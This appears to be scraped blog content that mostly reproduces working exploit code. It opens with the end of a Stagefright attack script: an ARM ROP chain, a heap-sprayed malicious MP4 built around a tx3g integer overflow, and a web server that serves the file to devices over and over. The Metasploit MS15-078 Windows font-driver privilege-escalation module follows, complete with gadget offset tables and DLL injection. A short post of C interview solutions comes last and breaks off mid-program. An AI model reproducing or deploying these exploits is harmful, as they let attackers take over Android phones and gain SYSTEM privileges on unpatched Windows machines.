  # so lr (the gadget that sets up r4-r7 for the call) sits after the pad
  page += pad(ldr_lr_bx_lr_stack_pad)
  page += p32(pop_r4_r5_r6_r7_pc)       # lr
  page += pad(4)

  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(mmap64)                   # pc

  # the 5th/6th mmap64 arguments are passed on the stack; the same words are
  # then consumed as r4-r7 by the next pop gadget when mmap64 returns
  page += p32(0xffffffff)               # fd      (and then r4)
  page += pad(4)                        # padding (and then r5)
  page += p64(0)                        # offset  (and then r6, r7)
  page += p32(pop_r0_r1_r2_r3_pc)       # pc

  # memcpy(mmap_address,
  #        spray_address - 0xed0,        /* start of the sprayed page */
  #        0xed0);                       /* sled + shellcode + filler */

  page += p32(mmap_address)             # r0 = dst
  page += p32(spray_address - 0xed0)    # r1 = src
  page += p32(0xed0)                    # r2 = size
  page += p32(0x33333333)               # r3
  page += p32(ldr_lr_bx_lr)             # pc

  page += pad(ldr_lr_bx_lr_stack_pad)
  page += p32(pop_r4_r5_r6_r7_pc)       # lr
  page += pad(4)

  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(memcpy)                   # pc

  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(mmap_address + 1)         # pc -> copied shellcode, Thumb bit set

  while len(page) < 0x1000:
    page += '#'

  pssh += page * (size // 0x1000)

  return chunk('pssh', pssh)
  
def exploit_mp4():
  """Assemble the malicious MP4 (ftyp + one trak) as a string.

  Structure, in order:
    1. a heap spray (spray_count pssh chunks of spray_size bytes, wrapped
       in a sample table so they end up in one cached allocation);
    2. groom allocations so that a tx3g buffer, the MPEG4DataSource object
       created on entering the stbl, and a pssh buffer sit next to each other;
    3. a second tx3g whose 64-bit "largesize" is the two's-complement negative
       of (len(overflow) - 24).  The parser presumably adds this to the
       existing tx3g size, wraps to a small value, allocates that, and then
       copies the earlier `overflow` bytes past the end -- overwriting the
       MPEG4DataSource's vtable pointer with spray_address and the r4-lr block
       that the stack_pivot gadget loads from this+0x4c (sp = spray_address +
       0x20, lr = pop_pc).
  The file's success depends on the hard-coded libc_base / spray_address
  guesses matching the target process.
  """
  ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex"))

  trak = ''

  # heap spray so we have somewhere to land our corrupted vtable
  # pointer

  # yes, we wrap this in a sample_table for a reason; the
  # NuCachedSource we will be using otherwise triggers calls to mmap,
  # leaving our large allocations non-contiguous and making our chance
  # of failure pretty high. wrapping in a sample_table means that we
  # wrap the NuCachedSource with an MPEG4Source, making a single
  # allocation that caches all the data, doubling our heap spray
  # effectiveness :-)
  trak += sample_table(heap_spray(spray_size) * spray_count)

  # heap groom for our MPEG4DataSource corruption

  # get the default size allocations for our MetaData::typed_data
  # groom allocations out of the way first, by allocating small blocks
  # instead.
  trak += alloc_avcc(8)
  trak += alloc_hvcc(8)

  # we allocate the initial tx3g chunk here; we'll use the integer
  # overflow so that the allocated buffer later is smaller than the
  # original size of this chunk, then overflow all of the following
  # MPEG4DataSource object and the following pssh allocation; hence why
  # we will need the extra groom allocation (so we don't overwrite
  # anything sensitive...)

  # | tx3g | MPEG4DataSource | pssh |
  overflow = 'A' * 24

  # | tx3g ----------------> | pssh |
  # first word of the MPEG4DataSource: its vtable pointer
  overflow += p32(spray_address)         # MPEG4DataSource vtable ptr
  overflow += '0' * 0x48
  # this+0x4c onwards is what `ldmia r2, {r4-lr}` in the pivot gadget reads
  overflow += '0000'                    # r4
  overflow += '0000'                    # r5
  overflow += '0000'                    # r6
  overflow += '0000'                    # r7
  overflow += '0000'                    # r8
  overflow += '0000'                    # r9
  overflow += '0000'                    # r10
  overflow += '0000'                    # r11
  overflow += '0000'                    # r12
  overflow += p32(spray_address + 0x20) # sp -> into the sprayed ROP chain
  overflow += p32(pop_pc)               # lr -> first `pop {pc}` off the new stack

  trak += chunk("tx3g", overflow)

  # defragment the for alloc_size blocks, then make our two
  # allocations. we end up with a spurious block in the middle, from
  # the temporary ABuffer deallocation.

  # | pssh | - | pssh |
  trak += memory_leak(alloc_size) * groom_count

  # | pssh | - | pssh | .... | avcC |
  trak += alloc_avcc(alloc_size)

  # | pssh | - | pssh | .... | avcC | hvcC |
  trak += alloc_hvcc(alloc_size)

  # | pssh | - | pssh | pssh | avcC | hvcC | pssh |
  trak += memory_leak(alloc_size) * 8

  # | pssh | - | pssh | pssh | avcC | .... |
  trak += alloc_hvcc(alloc_size * 2)

  # entering the stbl chunk triggers allocation of an MPEG4DataSource
  # object

  # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
  stbl = ''

  # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
  stbl += alloc_avcc(alloc_size * 2)

  # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
  # | pssh | - | pssh | pssh | tx3g ----------------> |
  # 64-bit two's complement of (len(overflow) - 24): forces chunk() into the
  # largesize form and is the value that wraps the parser's size arithmetic
  overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
  stbl += chunk("tx3g", '', length = overflow_length)

  trak += chunk('stbl', stbl)

  return ftyp + chunk('trak', trak)
  
# Landing page: embeds the MP4 in an <iframe> so the device's media stack
# parses it, and reloads itself every 4 s.  Each reload is a fresh parse and
# -- since the exploit depends on guessed addresses -- a fresh attempt;
# ExploitServer.index counts them.
index_page = '''
<!DOCTYPE html>
<html>
  <head>
    <title>Stagefrightened!</title>
  </head>
  <body>
    <script>
    window.setTimeout('location.reload(true);', 4000);
    </script>
    <iframe src='/exploit.mp4'></iframe>
  </body>
</html>
'''
  
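class ExploitServer(object):
  """CherryPy app: `/` serves the auto-reloading page, `/exploit.mp4` the MP4.

  The MP4 is built once, lazily on the first request, and cached on the
  instance.  It is served gzip-encoded because the spray alone is
  spray_size * spray_count = 16 MiB of highly repetitive data and the page
  re-fetches it every 4 s.  Compression is done in-process with the gzip
  module; the original shelled out to `gzip` and `rm` via os.system and left
  temporary files on disk while doing so.
  """

  exploit_file = None   # cached gzipped MP4 bytes, None until first request
  exploit_count = 0     # number of index page loads (== exploit attempts)

  @cherrypy.expose
  def index(self):
    """Serve the HTML page that embeds the MP4 and reloads itself."""
    self.exploit_count += 1
    print('*' * 80)
    print('exploit attempt: ' + str(self.exploit_count))
    print('*' * 80)
    return index_page

  @cherrypy.expose(["exploit.mp4"])
  def exploit(self):
    """Serve the (cached) gzip-encoded exploit MP4."""
    cherrypy.response.headers['Content-Type'] = 'video/mp4'
    cherrypy.response.headers['Content-Encoding'] = 'gzip'

    if self.exploit_file is None:
      exploit_uncompressed = exploit_mp4()
      buf = io.BytesIO()
      # mtime=0 keeps the compressed bytes identical across runs
      gz = gzip.GzipFile(fileobj=buf, mode='wb', mtime=0)
      try:
        gz.write(exploit_uncompressed)
      finally:
        gz.close()
      self.exploit_file = buf.getvalue()

    return self.exploit_file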
  
def main():
  """Resolve gadgets, write exploit.mp4 next to the script, start the server.

  'libc.so' must be the libc of the target device (gadget addresses are
  rebased onto `libc_base`).  exploit.mp4 is also written to disk so the same
  file can be delivered by other means.  Note that exploit_mp4() is built
  here and again lazily by ExploitServer on the first request.  No host/port
  is passed to cherrypy.quickstart, so CherryPy's defaults apply; adjust the
  server config if the device must reach it over the network.
  """
  find_rop_gadgets('libc.so')
  with open('exploit.mp4', 'wb') as tmp:
    tmp.write(exploit_mp4())
  cherrypy.quickstart(ExploitServer())
  
# script entry point (guarded so the helpers can be imported for testing)
if __name__ == '__main__':
  main()
AJITH KP

Microsoft Windows Font Driver Buffer Overflow

Hi GuyZ,
     Another Windows kernel bug with a public exploit: MS15-078 (CVE-2015-2426), a pool-based buffer overflow in the atmfd.dll font driver triggered by a malformed font. The Metasploit module below is a local privilege-escalation exploit (Msf::Exploit::Local) for specific Windows 8.1 x64 builds; the vulnerability was used by Hacking Team and came to light in the July leak of their data.

Metasploit Exploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
 
# Local privilege-escalation module for the atmfd.dll font-parsing bug
# (CVE-2015-2426 / MS15-078, see References). The Ruby side only gates on
# file versions, patches per-build offsets into a prebuilt reflective DLL and
# injects it; the kernel exploitation itself lives in that DLL. The bulletins
# listed under References are the vendor fix.
class Metasploit3 < Msf::Exploit::Local
  # Manual rank: runs only on explicit operator choice; `check` below decides
  # whether the target's build combination is one the module supports.
  Rank = ManualRanking

  # win32k.sys file versions for which set_win32k_offsets has an offset table.
  WIN32K_VERSIONS = [
    '6.3.9600.17393',
    '6.3.9600.17630',
    '6.3.9600.17694',
    '6.3.9600.17796',
    '6.3.9600.17837',
    '6.3.9600.17915'
  ]

  # ntoskrnl.exe file versions for which set_nt_offsets has an offset table.
  NT_VERSIONS = [
    '6.3.9600.17415',
    '6.3.9600.17630',
    '6.3.9600.17668',
    '6.3.9600.17936'
  ]

  # Mixins supplying expand_path/file_version (FileInfo, presumably), is_system?,
  # get_target_arch and the inject_* helpers used in `exploit`.
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  # Module metadata only; no target state is touched here.
  def initialize(info={})
    super(update_info(info, {
      'Name'            => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
      'Description'     => %q{
        This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
        a malformed font. The vulnerability was exploited by the hacking team and disclosed on
        the july data leak. This module has been tested successfully on vulnerable builds of
        Windows 8.1 x64.
      },
      'License'         => MSF_LICENSE,
      'Author'          => [
          'Eugene Ching',    # vulnerability discovery and exploit
          'Mateusz Jurczyk', # vulnerability discovery
          'Cedric Halbronn', # vulnerability and exploit analysis
          'juan vazquez'     # msf module
        ],
      'Arch'            => ARCH_X86_64,
      'Platform'        => 'win',
      'SessionTypes'    => [ 'meterpreter' ],
      'DefaultOptions'  => {
          'EXITFUNC'    => 'thread',
        },
      'Targets'         => [
          [ 'Windows 8.1 x64',  { } ]
        ],
      'Payload'         => {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'      => [
          ['CVE', '2015-2426'],
          ['CVE', '2015-2433'],
          ['MSB', 'MS15-078'],
          ['MSB', 'MS15-080'],
          ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
        ],
      'DisclosureDate'  => 'Jul 11 2015',
      'DefaultTarget'   => 0
    }))
  end

  # Rewrites the 64-bit little-endian placeholder values 0xdeedbeefdeedbe00..0d
  # inside the DLL image (a binary String, modified in place) with the win32k
  # offsets from @win32k_offsets. Requires set_win32k_offsets to have run; a
  # key with no matching `when` is silently ignored.
  def patch_win32k_offsets(dll)
    @win32k_offsets.each do |k, v|
      case k
      when 'info_leak'
        dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
      when 'pop_rax_ret'
        dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp'
        dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool'
        dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
      when 'pop_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
      when 'deref_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
      when 'pop_rbx_ret'
        dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
      when 'ret'
        dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_r11_ret'
        dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
      when 'add_rax_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
      when 'pop_rsp_ret'
        dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp_adjust'
        dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
      when 'chwnd_delete'
        dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
      end
    end
  end

  # Selects the per-build win32k offset table for @win32k (set by `check`) and
  # memoizes it in @win32k_offsets; nil for a build not listed below. Because
  # of `||=` the table is computed once and not refreshed if @win32k changes.
  def set_win32k_offsets
    @win32k_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17393'
        {
          'info_leak'           => 0x3cf00,
          'pop_rax_ret'         => 0x19fab,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6121,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x98156,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc432f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc4332,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6e314,  # ret C3
          'mov_rax_r11_ret'     => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbc8f,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
          'chwnd_delete'        => 0x165010  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17630'
        {
          'info_leak'           => 0x3d200,
          'pop_rax_ret'         => 0x19e9b,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6024,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x84f4f,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3f7f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3f82,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x7034e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xed33b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbb93,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x146EE0  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17694'
        {
          'info_leak'           => 0x3d300,
          'pop_rax_ret'         => 0x151f4,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x600c,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x2cf10,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3757,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc375a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x6682,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6683,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecd7b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x71380,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x1513D8  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17796'
        {
          'info_leak'           => 0x3d000,
          'pop_rax_ret'         => 0x19e4f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x5f64,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a5e,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3aa7,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3aaa,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x1B20,   # pop rbx # ret # 5B C3
          'ret'                 => 0x1B21,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecf8b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x29fd3,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x150F58  # CHwndTargetProp::Delete

        }
      when '6.3.9600.17837'
        {
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1a51f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62b4,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a4a,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3687,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc368a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x94871,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecbdb,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbd2c,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A470  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17915'
        {
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1A4EF,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62CC,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x9765A,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xC364F,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xC3652,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14DB,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14DC,   # ret # C3
          'mov_rax_r11_ret'     => 0x7060e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xECDCB,  # add rax, rcx # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbe33,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A220  # CHwndTargetProp::Delete
        }
      else
        nil
      end
    end.call(@win32k)
  end

  # Same scheme as patch_win32k_offsets for the two ntoskrnl placeholders
  # (0xdeedbeefdeedbe0e/0f). Requires set_nt_offsets to have run.
  def patch_nt_offsets(dll)
    @nt_offsets.each do |k, v|
      case k
      when 'set_cr4'
        dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool_with_tag'
        dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
      end
    end
  end

  # Selects the ntoskrnl offset table for @ntoskrnl (set by `check`) and
  # memoizes it in @nt_offsets; nil for a build not listed below.
  def set_nt_offsets
    @nt_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17415'
        {
          'set_cr4'                => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2a3a50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17630'
        {
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17668'
        {
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17936'
        {
          'set_cr4'                => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x29FA50  # ExAllocatePoolWithTag
        }
      else
        nil
      end
    end.call(@ntoskrnl)
  end

  # File version of %windir%\system32\atmfd.dll as "major.minor.build.revision",
  # or nil when file_version could not read it (major is nil).
  def atmfd_version
    file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")

    ver
  end

  # File version of %windir%\system32\win32k.sys, same shape as atmfd_version.
  def win32k_version
    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("win32k.sys file version: #{ver} branch: #{branch}")

    ver
  end

  # File version of %windir%\system32\ntoskrnl.exe, same shape as atmfd_version.
  def ntoskrnl_version
    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")

    ver
  end

  # Version-gated check. Returns Unknown for non-"Windows 8" or non-64-bit
  # sessions and for an ntoskrnl build without an offset table, Safe when
  # atmfd.dll is unreadable or newer than 5.1.2.243, Detected when atmfd is
  # vulnerable but the win32k build has no offset table, and Appears otherwise.
  # Side effect: sets @win32k and @ntoskrnl, which `exploit` relies on.
  def check
    # We have tested only windows 8.1
    if sysinfo['OS'] !~ /Windows 8/i
      return Exploit::CheckCode::Unknown
    end

    # We have tested only 64 bits
    if sysinfo['Architecture'] !~ /(wow|x)64/i
      return Exploit::CheckCode::Unknown
    end

    atmfd = atmfd_version
    # atmfd 5.1.2.238 => Works
    unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243')
      return Exploit::CheckCode::Safe
    end

    # win32k.sys 6.3.9600.17393 => Works
    @win32k = win32k_version

    unless @win32k && WIN32K_VERSIONS.include?(@win32k)
      return Exploit::CheckCode::Detected
    end

    # ntoskrnl.exe 6.3.9600.17415 => Works
    @ntoskrnl = ntoskrnl_version

    unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Appears
  end

  # Main flow: refuse already-SYSTEM sessions and any non-Appears check result,
  # require a native x64 session, resolve both offset tables, pick a host
  # process (a hidden notepad.exe, or the current process if creation is
  # denied), patch the offsets into reflective_dll.x64.dll from the data
  # directory, inject DLL and payload and start a thread at the DLL entry
  # with the payload address as its argument.
  def exploit
    print_status('Checking target...')
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    check_result = check
    if check_result == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Target not vulnerable')
    end

    if check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    if check_result == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
    end

    unless get_target_arch == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")

    # Both setters return nil for unknown builds; since `check` already
    # required membership in WIN32K_VERSIONS/NT_VERSIONS these guards are a
    # consistency backstop between the lists and the case tables.
    set_win32k_offsets
    fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?

    set_nt_offsets
    fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?

    begin
      print_status('Launching notepad to host the exploit...')
      notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end

    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
    library_path = ::File.expand_path(library_path)

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    # Read in binary mode so the placeholder QWORDs are matched byte-for-byte.
    dll = ''
    ::File.open(library_path, 'rb') { |f| dll = f.read }

    patch_win32k_offsets(dll)
    patch_nt_offsets(dll)

    exploit_mem, offset = inject_dll_data_into_process(process, dll)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end

end

Thursday 17 September 2015

AJITH KP

Some Campus Interview Questions and Solutions

Hi GuyZ,
     Here I'm sharing some campus interview questions and their answers. These questions were asked to a friend of mine who studies at the College of Engineering, Thalassery.

Q. No. 1

     Given an array of numbers and sliding window size, write a program to print maximum value in each sliding window.

      Eg. Input:
            Array of Numbers: 2 3 4 2 6 2 5 1
            Size of sliding window: 3
      Output:
            4 4 6 6 6 5

Solution

#include <stdio.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
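int main()
{
 /* Sliding-window maximum: read n numbers and a window size w, then print
    the largest value of each window of w consecutive elements.
    Input is validated so that n stays within the 256-slot buffer and w is
    within 1..n; a bad or out-of-range value ends the program with status 1. */
 int arr[256], w, n, i, j;
 printf("Enter size of array: ");
 if(scanf("%d", &n) != 1 || n < 1 || n > 256)
 {
  printf("Size must be between 1 and 256\n");
  return 1;
 }
 printf("Enter %d items: ", n);
 for(i=0;i<n;i++)
 {
  if(scanf("%d", &arr[i]) != 1)
  {
   printf("Invalid item\n");
   return 1;
  }
 }
 printf("Window size: ");
 if(scanf("%d", &w) != 1 || w < 1 || w > n)
 {
  printf("Window size must be between 1 and %d\n", n);
  return 1;
 }

 /* One window per start index i; scan its w elements for the maximum.
    arr[i] seeds max, so the inner scan starts at i+1. */
 for(i=0;i<n-w+1;i++)
 {
  int max=arr[i];
  for(j=i+1;j<i+w;j++)
  {
   if(arr[j]>max)
   {
    max = arr[j];
   }
  }
  printf("%d ", max);
 }
 printf("\n");
 return 0;
}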


Q. No. 2

     Given a positive value S, print all sequences of consecutive numbers whose sum is S.
   
     Eg. Input:
          15
     Output:
          1 2 3 4 5
          4 5 6
          7 8
          15

Solution

#include <stdio.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
#include <math.h>
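int main()
{
 /* Print every run of consecutive positive integers i, i+1, ..., j whose
    sum equals n, one run per line, in increasing order of i.
    For each start i the run is extended until its sum reaches or passes n
    and printed only on an exact hit. n must be positive; otherwise the
    program exits with status 1. The sum never exceeds n + j, so it cannot
    overflow for any n that fits in an int. */
 int n, i, j, k, sum;
 printf("Enter number: ");
 if(scanf("%d", &n) != 1 || n < 1)
 {
  printf("Number must be positive\n");
  return 1;
 }
 for(i=1;i<=n;i++)
 {
  sum = j = i;
  while(sum<n)
  {
   j++;
   sum += j;
  }
  if(sum == n)
  {
   for(k=i;k<=j;k++)
   {
    printf("%d ", k);
   }
   printf("\n");
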